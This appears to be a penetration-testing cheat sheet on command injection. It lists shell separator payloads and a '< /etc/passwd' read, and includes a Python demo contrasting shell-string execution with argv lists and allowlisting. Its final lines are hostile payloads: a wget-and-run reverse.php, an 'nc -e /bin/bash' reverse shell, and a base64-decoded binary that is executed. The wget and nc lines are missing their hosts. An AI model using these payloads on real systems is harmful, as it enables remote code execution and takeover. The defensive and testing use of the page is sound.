
Command Injection

If you see that your input could be used to execute any kind of command on the host, you definitely need to test for this vulnerability.

Command Injection/Execution

`ls` # ``
$(ls) # $()
ls; id # ; Chain commands
ls||id; ls ||id; ls|| id; ls || id # Execute the second only if the first fails
ls|id; ls |id; ls| id; ls | id # Execute both (using a pipe)
ls&&id; ls &&id; ls&& id; ls && id # Execute the second only if the first succeeds
ls&id; ls &id; ls& id; ls & id # Execute both, but you can only see the output of the second
ls %0A id # %0A (URL-encoded newline) Execute both (RECOMMENDED)
# Not executed, but may be interesting
> /var/www/html/out.txt # Try to redirect the output to a file
< /etc/passwd # Try to send some input to the command
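
Why the separators listed above work, and what stops them, as an added example that is not part of the original page: a hypothetical handler passes the same input to `echo` first through a shell and then as an argument vector. The sample inputs are constructed, `MARKER` is a harmless stand-in for an injected command's output, and the hostname allowlist is an assumed input format.

```python
import re
import subprocess

MARKER = "MARKER"  # harmless stand-in for an injected command's output

# Constructed inputs: one per separator from the list above, each trying to
# append `echo MARKER` to the command the application meant to run.
SAMPLES = [
    "x; echo MARKER",
    "x | echo MARKER",
    "x && echo MARKER",
    "x & echo MARKER",
    "x\necho MARKER",      # what %0A becomes after URL decoding
    "$(echo MARKER)",
    "`echo MARKER`",
]

def run_unsafe(value: str) -> str:
    """Vulnerable pattern: input concatenated into a string parsed by /bin/sh."""
    return subprocess.run("echo " + value, shell=True,
                          capture_output=True, text=True).stdout

def run_safe(value: str) -> str:
    """Hardened pattern: argv list, no shell, so metacharacters stay data."""
    return subprocess.run(["echo", value],
                          capture_output=True, text=True).stdout

def is_allowed(value: str) -> bool:
    """Allowlist for a hostname-like parameter (assumed input format)."""
    return re.fullmatch(r"[A-Za-z0-9.-]{1,253}", value) is not None

def injected_ran(output: str) -> bool:
    """True when the appended command executed and printed MARKER on its own line."""
    return MARKER in output.splitlines()

if __name__ == "__main__":
    for s in SAMPLES:
        print(f"{s!r:24} shell={injected_ran(run_unsafe(s))} "
              f"argv={injected_ran(run_safe(s))} allowed={is_allowed(s)}")
```

Every sample executes the appended command through the shell and none does through the argument vector; the allowlist rejects all of them before any process is started.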


vuln= %0a wget -O /tmp/reverse.php %0a php /tmp/reverse.php
vuln= nc -e /bin/bash 80
vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay